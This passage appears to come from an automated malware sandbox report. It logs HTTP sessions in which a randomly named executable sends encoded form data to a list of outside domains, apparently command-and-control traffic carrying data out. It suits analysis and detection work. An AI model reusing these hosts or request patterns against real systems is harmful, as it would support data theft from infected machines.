                                                      • www.zhuan-tou.com
                                                      • www.lecoinsa.net
                                                      • www.8xbe578.app
                                                      • www.synergon.space
                                                      • www.alanbeanart.com
                                                      • www.kacotae.com
                                                      • www.slushcafe.top
                                                      • www.a9jcpf.top
                                                      • www.tqfabxah.com
                                                      • www.rtrpodcast.online
                                                      • www.mqmsqkw.lol
                                                      • www.lfghtko.lol

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.9541103.33.130.190801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:24:40.033992052 CEST440OUTGET /toda/?dZo=obOL9JCgNxwS4++f28d79f/ijUfggy2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPePyq+6ekfY+odIcNiDDxjsozDdHvvMQ==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.stemfiniti.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Aug 18, 2024 18:24:41.453566074 CEST394INHTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:24:41 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 254
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 64 5a 6f 3d 6f 62 4f 4c 39 4a 43 67 4e 78 77 53 34 2b 2b 66 32 38 64 37 39 66 2f 69 6a 55 66 67 67 79 32 67 30 73 48 56 5a 6b 79 62 69 68 51 30 46 6f 56 33 35 43 30 4f 46 31 44 52 71 66 4a 68 38 69 69 73 77 54 77 4a 51 55 56 38 37 6d 2b 59 4e 2f 71 6b 4c 62 50 65 50 79 71 2b 36 65 6b 66 59 2b 6f 64 49 63 4e 69 44 44 78 6a 73 6f 7a 44 64 48 76 76 4d 51 3d 3d 26 67 74 61 3d 72 7a 71 58 66 34 41 30 32 46 45 6c 5f 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?dZo=obOL9JCgNxwS4++f28d79f/ijUfggy2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPePyq+6ekfY+odIcNiDDxjsozDdHvvMQ==&gta=rzqXf4A02FEl_8"}</script></head></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.95411138.12.1.29801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:24:57.118403912 CEST698OUTPOST /pjmu/ HTTP/1.1
                                                      Host: www.zhuan-tou.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.zhuan-tou.com
                                                      Referer: http://www.zhuan-tou.com/pjmu/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 2b 6a 66 39 32 4f 4e 31 36 59 6b 49 66 54 72 59 7a 4e 41 32 41 32 31 33 7a 6b 79 64 76 4b 35 73 43 77 5a 4a 65 52 53 6c 66 48 38 59 4b 59 61 48 45 4a 33 39 55 47 4c 31 6a 59 68 30 4e 32 4e 48 42 38 52 5a 77 74 68 2f 4f 73 4b 44 7a 50 4c 71 78 30 72 45 5a 68 38 4e 55 75 39 46 68 6c 66 4b 56 47 36 61 4d 35 79 38 43 67 6c 47 31 39 2f 7a 47 69 4b 6d 41 6c 52 38 57 56 67 2f 2f 42 6f 39 47 37 58 4b 56 6e 4d 59 4b 56 56 56 62 5a 2b 34 34 31 58 72 48 7a 4a 69 57 37 49 69 70 4c 7a 72 62 4d 6d 72 54 6f 54 51 30 4a 4e 6b 70 5a 6b 54 52 42 68 6c 44 44 59 71 36 75 5a 6a
                                                      Data Ascii: dZo=+jf92ON16YkIfTrYzNA2A213zkydvK5sCwZJeRSlfH8YKYaHEJ39UGL1jYh0N2NHB8RZwth/OsKDzPLqx0rEZh8NUu9FhlfKVG6aM5y8CglG19/zGiKmAlR8WVg//Bo9G7XKVnMYKVVVbZ+441XrHzJiW7IipLzrbMmrToTQ0JNkpZkTRBhlDDYq6uZj
                                                      Aug 18, 2024 18:24:57.999445915 CEST691INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Sun, 18 Aug 2024 16:24:57 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.95411238.12.1.29801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:24:59.653018951 CEST722OUTPOST /pjmu/ HTTP/1.1
                                                      Host: www.zhuan-tou.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.zhuan-tou.com
                                                      Referer: http://www.zhuan-tou.com/pjmu/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 2b 6a 66 39 32 4f 4e 31 36 59 6b 49 66 79 62 59 67 61 55 32 42 57 31 30 38 45 79 64 30 36 35 6f 43 77 64 4a 65 56 43 31 66 31 6f 59 4c 39 6d 48 46 49 33 39 54 47 4c 31 33 49 68 4c 44 57 4e 4d 42 38 4e 2f 77 73 64 2f 4f 73 4f 44 7a 4e 54 71 77 43 6a 48 62 78 38 4c 5a 4f 39 48 2f 56 66 4b 56 47 36 61 4d 35 32 47 43 67 39 47 30 4f 6e 7a 55 58 32 6c 4e 46 52 37 41 46 67 2f 75 78 6f 35 47 37 58 53 56 6d 51 79 4b 58 64 56 62 5a 75 34 34 67 72 6f 63 6a 4a 6b 53 37 4a 56 6c 4b 79 67 58 2b 4b 30 58 70 72 43 69 5a 56 66 6a 59 45 4e 41 7a 6f 2b 57 55 59 4e 39 4a 51 4c 66 67 38 61 43 6d 38 68 38 61 46 4d 61 55 63 79 32 66 53 37 67 41 3d 3d
                                                      Data Ascii: dZo=+jf92ON16YkIfybYgaU2BW108Eyd065oCwdJeVC1f1oYL9mHFI39TGL13IhLDWNMB8N/wsd/OsODzNTqwCjHbx8LZO9H/VfKVG6aM52GCg9G0OnzUX2lNFR7AFg/uxo5G7XSVmQyKXdVbZu44grocjJkS7JVlKygX+K0XprCiZVfjYENAzo+WUYN9JQLfg8aCm8h8aFMaUcy2fS7gA==
                                                      Aug 18, 2024 18:25:00.535697937 CEST691INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Sun, 18 Aug 2024 16:25:00 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.95411338.12.1.29801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:25:02.183993101 CEST1735OUTPOST /pjmu/ HTTP/1.1
                                                      Host: www.zhuan-tou.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.zhuan-tou.com
                                                      Referer: http://www.zhuan-tou.com/pjmu/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 2b 6a 66 39 32 4f 4e 31 36 59 6b 49 66 79 62 59 67 61 55 32 42 57 31 30 38 45 79 64 30 36 35 6f 43 77 64 4a 65 56 43 31 66 31 51 59 4c 50 65 48 45 72 50 39 53 47 4c 31 30 49 68 4f 44 57 4e 72 42 38 56 37 77 73 52 76 4f 71 53 44 7a 6f 50 71 67 67 4c 48 53 78 38 4c 51 75 39 61 68 6c 66 36 56 47 72 64 4d 34 47 47 43 67 39 47 30 50 58 7a 58 43 4b 6c 50 46 52 38 57 56 67 4e 2f 42 6f 64 47 37 50 43 56 6d 55 49 4b 6d 39 56 62 35 65 34 39 57 2f 6f 51 6a 4a 6d 56 37 4a 4e 6c 50 71 76 58 2b 57 57 58 70 66 6b 69 61 31 66 69 39 78 74 63 33 59 39 49 6c 45 4b 79 71 77 35 53 6d 73 4b 45 57 41 34 38 4b 74 78 4e 58 64 66 38 38 50 30 2f 52 41 61 7a 43 75 5a 46 56 76 33 37 34 42 66 47 62 2f 71 4b 4f 43 52 30 57 4a 6b 4e 79 54 43 6e 68 53 67 75 68 4c 6d 54 59 74 46 6f 70 55 72 61 77 67 55 4e 31 68 71 6f 45 57 30 35 45 6d 5a 30 7a 77 2f 37 37 36 64 32 5a 36 41 42 65 69 38 41 69 4a 37 4b 6b 41 4e 35 6d 77 31 33 76 6d 4c 2f 6c 78 4d 79 38 32 33 45 57 31 79 42 36 64 31 59 6b 7a 46 70 64 77 6f 31 63 33 45 58 45 [TRUNCATED]
                                                      Data Ascii: dZo=+jf92ON16YkIfybYgaU2BW108Eyd065oCwdJeVC1f1QYLPeHErP9SGL10IhODWNrB8V7wsRvOqSDzoPqggLHSx8LQu9ahlf6VGrdM4GGCg9G0PXzXCKlPFR8WVgN/BodG7PCVmUIKm9Vb5e49W/oQjJmV7JNlPqvX+WWXpfkia1fi9xtc3Y9IlEKyqw5SmsKEWA48KtxNXdf88P0/RAazCuZFVv374BfGb/qKOCR0WJkNyTCnhSguhLmTYtFopUrawgUN1hqoEW05EmZ0zw/776d2Z6ABei8AiJ7KkAN5mw13vmL/lxMy823EW1yB6d1YkzFpdwo1c3EXE/Os4qhPXbOcNvS/d1z//rrNvR0qjdNZp2pIgT89dZwVQ775BaMZe9tm3ZTKiLZ+qLF9pPOCd2E1vlgGIn+QQR6Lh20+U2z++ymv+EMI13PPH1SKK+9gIe2dM5QSs56/Dqy+d23MVXDFmVACbyFMapQjzaWRLUfSlmRbs5W0KZEpo+u6B96MoIdhHMdJLMLRXmT1vqkmLPuXlmn0OrloqNlwBw3M+TmzGttEL4i+YFF4Fw4DV8mSUxU+DD/eR77r29apBQN0E8Jx0Q3wdlMdnFmNKHVEpfQinYusB99BVsZGN5aopdP6OvzrXpOy5oI8tQyd7AfA19u4MiDf5NZIYYiXaKHIaruh1LmdHrR8n4G1g8ajw9HFGpKCEPueQhZowPf7GEC6OFaEfBueRFgNv8RiRpIGdMFyLJQm/MAcwze38HtW3qNbSHsPJElm/wjzLwLcj1CGS0meclzhD0TuLTwkZ1bs376wj83Wy1P0VJEv7psuLwUvP6aSMTbjVC4U9Ivwc4+nd3beQbZxLTiNKGHg+zXzJeHEP4wsS+vQPFJJeBEYNlKW7LdovwAIG69ujyRslBq/RcBdhbVgsPDfi7tPe36dq28xTsBcRv75FyprbL/samykPaoOMO0x9s8VhKUuBSGbnFQOhTlZgFcduOAJRodOnBTELQS [TRUNCATED]
                                                      Aug 18, 2024 18:25:03.084317923 CEST691INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Sun, 18 Aug 2024 16:25:02 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.95411438.12.1.29801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:25:04.718010902 CEST439OUTGET /pjmu/?dZo=zh3d17Jww7lUdSTktMhNBhMmvkGT0/ltGm9RdVCgVGhfN4W3cKL6T1z80tBiQSN9EuR6w+tbLdSr4eDL0g7GOxg8UddFklL4THbJOpCVHjpswub4FA==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.zhuan-tou.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Aug 18, 2024 18:25:05.596633911 CEST691INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Sun, 18 Aug 2024 16:25:05 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.954115217.116.0.191801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:25:10.836031914 CEST695OUTPOST /7ffx/ HTTP/1.1
                                                      Host: www.lecoinsa.net
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.lecoinsa.net
                                                      Referer: http://www.lecoinsa.net/7ffx/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 57 50 34 55 38 35 51 38 49 43 6e 76 45 65 32 35 32 6d 53 45 4a 61 6c 6b 2b 57 78 48 43 53 54 68 63 4c 39 59 2f 68 6b 4a 63 41 53 52 6a 2f 2f 75 7a 72 7a 39 6f 34 51 6a 50 49 56 77 51 36 69 38 50 46 49 6d 62 76 6a 41 65 7a 4d 72 30 6d 66 55 58 57 52 71 43 69 2b 36 4e 68 37 4c 35 57 38 62 42 43 63 6f 78 34 7a 6f 52 42 35 62 43 6c 44 6e 31 36 46 61 36 37 64 2b 48 47 46 35 2b 6b 48 58 53 44 74 2f 57 6d 4b 78 54 35 6e 78 4f 4b 37 75 33 69 4c 5a 49 35 47 78 4f 45 69 51 46 41 33 38 37 47 66 6d 32 73 37 58 73 2f 38 30 38 2b 30 4d 39 57 69 4c 66 38 4e 54 54 39 45 32
                                                      Data Ascii: dZo=WP4U85Q8ICnvEe252mSEJalk+WxHCSThcL9Y/hkJcASRj//uzrz9o4QjPIVwQ6i8PFImbvjAezMr0mfUXWRqCi+6Nh7L5W8bBCcox4zoRB5bClDn16Fa67d+HGF5+kHXSDt/WmKxT5nxOK7u3iLZI5GxOEiQFA387Gfm2s7Xs/808+0M9WiLf8NTT9E2
                                                      Aug 18, 2024 18:25:11.551311970 CEST572INHTTP/1.1 301 Moved Permanently
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:25:11 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: http://lecoinsa.net/7ffx/
                                                      Data Raw: 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 22 3e 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f [TRUNCATED]
                                                      Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/7ffx/'" /> <title>Redirecting to http://lecoinsa.net/7ffx/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/7ffx/">http://lecoinsa.net/7ffx/</a>. </body></html>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.954116217.116.0.191801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:25:13.373100042 CEST719OUTPOST /7ffx/ HTTP/1.1
                                                      Host: www.lecoinsa.net
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.lecoinsa.net
                                                      Referer: http://www.lecoinsa.net/7ffx/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 57 50 34 55 38 35 51 38 49 43 6e 76 46 2f 47 35 37 6c 36 45 63 71 6c 6e 6e 57 78 48 4a 79 54 74 63 4c 35 59 2f 6b 63 5a 64 32 43 52 69 62 7a 75 79 75 66 39 76 34 51 6a 58 34 56 31 65 61 69 72 50 46 4d 66 62 71 62 41 65 7a 49 72 30 6a 62 55 58 68 46 74 43 79 2b 34 56 52 37 7a 33 32 38 62 42 43 63 6f 78 34 6d 44 52 46 56 62 42 55 7a 6e 31 62 46 56 6d 4c 64 35 4f 6d 46 35 70 30 47 63 53 44 73 51 57 6e 57 62 54 37 66 78 4f 50 58 75 35 58 33 61 43 35 47 7a 41 6b 69 46 50 67 65 44 69 56 44 6c 6f 38 6e 74 39 64 59 63 32 2f 55 53 73 6b 72 51 4b 72 4e 30 55 61 4e 65 31 6c 4d 77 46 6a 43 6e 43 45 63 6b 73 6f 35 34 61 6b 78 35 4a 77 3d 3d
                                                      Data Ascii: dZo=WP4U85Q8ICnvF/G57l6EcqlnnWxHJyTtcL5Y/kcZd2CRibzuyuf9v4QjX4V1eairPFMfbqbAezIr0jbUXhFtCy+4VR7z328bBCcox4mDRFVbBUzn1bFVmLd5OmF5p0GcSDsQWnWbT7fxOPXu5X3aC5GzAkiFPgeDiVDlo8nt9dYc2/USskrQKrN0UaNe1lMwFjCnCEckso54akx5Jw==
                                                      Aug 18, 2024 18:25:14.036062956 CEST572INHTTP/1.1 301 Moved Permanently
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:25:13 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
